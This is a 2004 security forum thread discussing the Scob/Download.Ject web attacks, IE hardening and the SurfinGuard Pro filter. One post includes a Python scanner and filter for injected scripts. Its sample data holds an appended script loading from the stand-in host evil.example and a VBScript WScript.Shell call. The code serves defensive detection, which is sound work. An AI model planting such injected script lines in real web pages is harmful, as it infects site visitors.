A New Era of Internet Threats

Discussion in 'malware problems & news' started by ronjor, Aug 6, 2004.

Thread Status:
Not open for further replies.
  1. ronjor

    ronjor Global Moderator

    In the earlier age of virus attacks, computer users had to interact with the infection vehicle in order to activate the virus. While those old techniques relied on the ignorance of end-users, in today's world the end-user doesn't have to do anything wrong. The Scob attacks of this past June give a hint of what's to come.

    Internet security firms are gearing up for an onslaught of new attacks that hackers will hurl at inboxes and Web sites.

    As the computer industry awaits the release of Service Pack 2 of Microsoft's Windows XP -- which will feature improved security capabilities -- hackers are waiting too. They have spent the last 12 months mastering mobile attack techniques and an arsenal of devastating weapons that might make Windows XP SP2 even more vulnerable than the old Windows 98.

    ecommercetimes
     
  2. Devinco

    Devinco Registered Member

    Thanks Ronjor,

    Good article.
    Is there anywhere I can learn more about these SSL vulnerabilities and how to protect against them?
    It explained a little bit here, but could Proxomitron be set up to do something similar?
     
  3. ronjor

    ronjor Global Moderator

    Good questions Devinco.

    I slapped SurfinGuard Pro on my machine to see what it offered. I have it set in the high mode.
    Anyone out there use this app?
     


  4. Devinco

    Devinco Registered Member

    Ronjor,

    I just found a helpful post by Paranoid2000 on The dangers of HTTPS. It also answers the question about Proxomitron: yes it can filter HTTPS with a special plugin.

    The SurfinGuard Pro looks interesting, kind of like a combo of SSM and Proxomitron? But I wonder, since it is external to the browser, is it able to see into the encrypted HTTPS?
     
  5. ronjor

    ronjor Global Moderator

  6. Devinco

    Devinco Registered Member

    Thanks for the link Ronjor.

    Nice tests. I saw no real difference between the SSL and non-SSL tests in practice though. The exploits that work in SSL work just as well non-SSL.
    I tried them all with both FF 0.92 (will upgrade soon) and IE6.
    This was with no Proxomitron or other prefiltering.
    FF fared better even with tight IE settings.
    The scrap object demo was pretty sneaky, but I was alerted by both Wormguard and Word.
    One interesting thing is that IE allows you to disable downloads (thwarting the direct download test) while FF does not.
     
  7. ronjor

    ronjor Global Moderator

    Devinco

    The program seems tailored to IE. I tried IE with different settings and this program stops access to several sites with the setting on high.
     
  8. Primrose

    Primrose Registered Member

    On the article..

    Itzy Sabo from Finjan Software is trying to sell you a bill of goods with these comments and the scare tactics Jack M. Germain intertwined in his article with some of these statements.


    "The Scob worm is the first attack in which hackers use a mix of mobile application techniques -- including VBScript, JavaScript and ActiveX -- to create a blended Web-based attack that can manifest across standard Web protocols like HTTP.

    The attack is based on the execution of a series of mobile code scripts that infect Web servers and spread by way of users who visit those servers. Visitors to the Web site unknowingly download the Scob virus and thus participate in the propagation.
    This is a very complex attack that none of the traditional security products were easily able to detect and combat. The virus operated as a VBScript utility, which targeted Microsoft IIS servers and appends a malicious JavaScript to Web pages in the compromised Web server"

    And then the solution they both present..

    In fact it is all lazy webmasters who did not take advantage of the fix on their side, which was available 3 months prior... and then users who did not have their system locked down using IE.

    Microsoft Security Bulletin MS04-025
    http://www.microsoft.com/technet/security/bulletin/MS04-025.mspx


    On June 24, 2004, a flaw in Microsoft IIS servers led to compromised webservers that redirected visitors to a malicious website hosted in Russia. That site exploited additional flaws in Internet Explorer to force downloads of Trojans onto the hijacked visitor's system. The malware residing on the impacted IIS servers was dubbed Download.Ject, JS.Scob.Trojan, JS.Toofeer, and the Scob Trojan depending on the antivirus vendor.

    The Trojan downloaded after visitors were redirected to the Russian website has been identified as BackDoor-AXJ.dll by antivirus vendor Network Associates and Padodor.W by antivirus vendor F-Secure. According to Network Associates, the Trojan provides remote access to the infected system, creates a web proxy, and can automatically download other malicious files. According to F-Secure, the Trojan is used to steal passwords and credit card numbers from infected systems.

    Microsoft released a patch for the IIS vulnerabilities in April 2004. The patch, MS04-011, would have prevented the webservers from being penetrated. Without it, the attackers were able to append exploit code to various files on the webserver. That code then forced users to another site exploiting MS04-013, a flaw that has routinely been used to deliver Trojans via email links that lead to booby-trapped websites. (See Scam emails deliver Trojaned goods). A second, as yet unpatched, flaw in Internet Explorer was also exploited in the Scob attacks.

    Though the Scob attacks received widespread media attention, they were quite short-lived. The Russian site dishing up the Trojan was shutdown on the same date - June 24, 2004 - the attacks began. However, similar attacks via email remain quite prevalent. The websites used in those attacks vary. Similar to a phishing scam, the miscreant email attempts to lure the user into visiting a particular site. Unlike a phishing scam, however, instead of soliciting financial details, the site surreptitiously infects the visitor's system with Trojans used for remote-access, keylogging, or downloading further malicious files.


    Research analysis firm Gartner says although the Internet-based code attack, called Scob or Tropher, that exploits unpatched security flaws in Microsoft's Internet Explorer has been dealt with, "copycat" attacks are highly likely, according to a recent report posted on the company's website.

    The firm has recommended users make more investments to protect themselves against virus attacks and give themselves more time to patch and update their systems.

    Referring to the latest Scob attack, the firm said "many enterprises have already implemented technologies for Web filtering and content monitoring that can help protect against such attacks."

    Scob is a three-stage attack: The user visits a website that has either been defaced with malicious code or established to infect systems; a malicious script on the site is executed, infecting the user's PC and downloading exploit code; finally, the code on the infected system sends information to an external site.

    The original sites hosting Scob have been shut down, but "copycat" attacks - including spam and phishing attacks - are highly likely, it says.

    Web and content filters can help with such attacks, but they remain reactive and often require that blacklists be developed after a malicious site is detected. "Proactive detection and filtering of potentially malicious code offers a better defence against Scob-type attacks, as well as other spyware and malware threats," says the research. Gartner also recommends filtering vendors expand these capabilities in their products as soon as possible.

    Also, it advises users to:

    Use installed Web filtering applications to block known infected sites and sources of malicious code.

    Block scripting code at the gateway until Microsoft releases a patch for the Internet Explorer flaws.

    Filter Internet Traffic to Stop 'Scob Copycat' Attacks

    http://www4.gartner.com/DisplayDocument?doc_cd=121672

    Harden Your Windows Servers Against Internet Explorer Flaw
    http://www4.gartner.com/DisplayDocument?doc_cd=121587

    Qwik-Fix™ provides another layer of essential security

    http://www.qwik-fix.net/
    c't-IEController 2.0
    http://www.heise.de/ct/ftp/projekte/iecontroller/

    'Zero-Day' Internet Explorer Flaw Detected

    http://www.eeye.com/html/research/alerts/AL20040610.html


    Prevention:
    Disable Active Scripting, except for trusted web sites. Alternative browsers such as Mozilla, Opera or Netscape are not subject to this attack.

    Additionally, as a public service to the network security community, eEye Digital Security has developed utilities to assist with the remediation of the flaws these attacks are leveraging. To download these tools please visit:

    http://www.eeye.com/html/research/tools/IESecurityRegFixer.zip

    Update: These issues have now been updated by Microsoft and a patch is available.


    So who has active scripting enabled ??
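    As an added example (not code from the article, from Gartner, eEye or Finjan, nor from Proxomitron or SurfinGuard), here is a Python script covering the two defensive angles the posts above discuss: a webmaster-side sweep over served pages for the appended-script pattern Scob used (a compromised server tacking a script onto every page it serves, pulling a loader from a third-party host), and the gateway-side "block scripting except from trusted sites" filter that Gartner and eEye recommend, and that Devinco asks whether Proxomitron could do. The trusted-host allowlist, the sample pages and the host name evil.example are constructed placeholders, not taken from the thread.

```python
"""Heuristic detection and filtering for Scob/Download.Ject-style script injection.

Added example for this thread, not code from any vendor or tool named in it.
The trusted-host list, sample pages and 'evil.example' are constructed
placeholders (assumptions, not facts from the page).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse

# <script ...>...</script>, case-insensitive, across lines.  A regex is adequate
# for a sweep over static files; a gateway filter that must resist evasion
# (split tags, odd encodings) should use a real HTML parser instead.
SCRIPT_RE = re.compile(r"<script\b(?P<attrs>[^>]*)>(?P<body>.*?)</script\s*>",
                       re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
LANG_RE = re.compile(r"""\b(?:language|type)\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Tell-tales of drive-by loaders: decoded document.write, eval, ActiveX/COM use.
SUSPICIOUS_BODY_RE = re.compile(
    r"document\.write\s*\(\s*unescape|\beval\s*\(|ActiveXObject|CreateObject",
    re.IGNORECASE)


@dataclass
class Finding:
    reason: str
    snippet: str


def _split_at_html_end(html: str) -> tuple[str, str]:
    """Return (document, trailing) split after the last </html> (ASCII case-insensitive)."""
    end = html.lower().rfind("</html>")
    if end == -1:
        return html, ""
    cut = end + len("</html>")
    return html[:cut], html[cut:]


def find_injected_scripts(html: str, trusted_hosts: frozenset[str]) -> list[Finding]:
    """Webmaster-side sweep: flag scripts that look injected rather than authored."""
    findings: list[Finding] = []
    _, trailing = _split_at_html_end(html)
    # A server that appends a payload to every page leaves it after </html>;
    # authored pages do not put scripts there.
    if SCRIPT_RE.search(trailing):
        findings.append(Finding("script appended after </html>", trailing.strip()[:80]))
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group("attrs"), m.group("body")
        src = SRC_RE.search(attrs)
        if src:
            host = (urlparse(src.group(1)).hostname or "").lower()  # '' for relative URLs
            if host and host not in trusted_hosts:
                findings.append(Finding(f"external script from untrusted host {host}", src.group(1)))
        lang = LANG_RE.search(attrs)
        if lang and "vbs" in lang.group(1).lower():
            findings.append(Finding("VBScript block", body.strip()[:80]))
        if SUSPICIOUS_BODY_RE.search(body):
            findings.append(Finding("obfuscated/ActiveX script body", body.strip()[:80]))
    return findings


def strip_untrusted_scripts(html: str, trusted_hosts: frozenset[str]) -> str:
    """Gateway-side filter: keep only external scripts served from trusted hosts.

    Inline scripts and scripts from other hosts are removed, and anything after
    </html> is discarded: the 'block scripting except for trusted sites' policy
    applied to the response body instead of in the browser's zone settings.
    """
    document, _ = _split_at_html_end(html)

    def keep_or_drop(m: re.Match[str]) -> str:
        src = SRC_RE.search(m.group("attrs"))
        if src:
            host = (urlparse(src.group(1)).hostname or "").lower()
            if host in trusted_hosts:
                return m.group(0)
        return ""

    return SCRIPT_RE.sub(keep_or_drop, document) + "\n"


# Constructed sample data (placeholders, not real sites).
TRUSTED = frozenset({"www.example.com", "cdn.example.com"})

CLEAN_PAGE = (
    "<html><head>\n"
    '<script src="https://cdn.example.com/site.js"></script>\n'
    "</head><body><p>Hello</p></body></html>\n"
)

# Mimics the pattern the thread describes: the compromised server appends a
# script block after the closing tag of every page, pulling a loader from a
# third-party host and using VBScript/COM on the visitor's machine.
INFECTED_PAGE = CLEAN_PAGE + (
    '<script src="http://evil.example/loader.js"></script>\n'
    '<script language="vbscript">Set o = CreateObject("WScript.Shell")</script>\n'
)

INLINE_PAGE = "<html><body><script>alert(1)</script><p>x</p></body></html>"


if __name__ == "__main__":
    for name, page in ("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE):
        for f in find_injected_scripts(page, TRUSTED):
            print(f"{name}: {f.reason}: {f.snippet!r}")
    print(strip_untrusted_scripts(INFECTED_PAGE, TRUSTED) == CLEAN_PAGE)
```

    Two caveats a practitioner would want. The sweep is heuristic: a script that is authored but obfuscated will be flagged, and a loader split across tags or hidden in an event-handler attribute will not, so treat hits as leads for manual review rather than verdicts. And on Devinco's question about seeing into HTTPS: a filter like strip_untrusted_scripts can only act on an HTTPS response if the proxy terminates the TLS connection itself (the browser then trusts the proxy's certificate rather than the site's); a filter sitting outside the browser that does not do this sees only ciphertext.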
     
  9. ronjor

    ronjor Global Moderator

    Good points. I use Firefox anyway. :D

    I have to admit, he is a good salesman.
     
  10. ronjor

    ronjor Global Moderator

    Okay. I took SurfinGuard Pro off my XP machine. Not without a fight though. I got some error about java injection blah, blah. So I reinstalled and tried to deinstall. Got another error. Since I make a restore point before I install programs, I banished this program to the basement of history! :D

    Do not install this program is my best advice. :mad:
     